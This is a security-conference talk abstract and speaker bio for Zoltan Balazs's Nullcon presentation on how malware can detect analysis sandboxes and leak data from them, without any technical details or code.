Zoltan Balazs

CTO, MRG Effitas (Netherlands)

Paper Title

Sandbox detection: Abuse, test, leak


Manual processing of malware samples became impossible years ago. Sandboxes are used to automate the analysis of malware samples to gather information about the dynamic behaviour of the malware, both at AV companies and at enterprises. Some malware samples use known techniques to detect when it runs in a sandbox, but most of these sandbox detection techniques can be easily detected and thus flagged as malicious. During my research I invented new approaches to detect these sandboxes. I developed (and will publish during my presentation) a tool, which can collect a lot of interesting information from these sandboxes to create statistics how the current technologies work (and fail). After analysing these results I will demonstrate tricks to detect sandboxes. These tricks can’t be easily flagged as malicious. Some sandboxes don’t not interact with the Internet in order to block data extraction, but with some DNS-fu the information can be extracted from these appliances as well.

This presentation will include a lot of interaction with the audience as we analyse the results together.

If you already have bought or are planning to buy a “magic” malware analysis/detection sandbox, this is a must see presentation for you. The sandbox detection techniques used in “APT”s like BlackEnergy or DOUBLEFANTASY can be considered old, outdated and they lack creativeness compared to these new techniques.

Speaker Bio

Zoltan (@zh4ck) is the Chief Technology Officer at MRG Effitas, a company focusing on AV testing.
Before MRG Effitas, he had been working as an IT Security expert in the financial industry for 5 years and as a senior IT security consultant at one of the Big Four companies for 2 years. His main expertise areas are penetration testing, malware analysis and computer forensics and security monitoring. He released the Zombie browser tool that has POC malicious browser extensions for Firefox, Chrome and Safari. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass). He has been invited to give presentations at information security conferences worldwide including DEF CON, Hacker Halted USA, Hackcon, OHM, Hacktivity and Ethical Hacking.

Copyright © 2019-20 | Nullcon India | International Security Conference | All Rights Reserved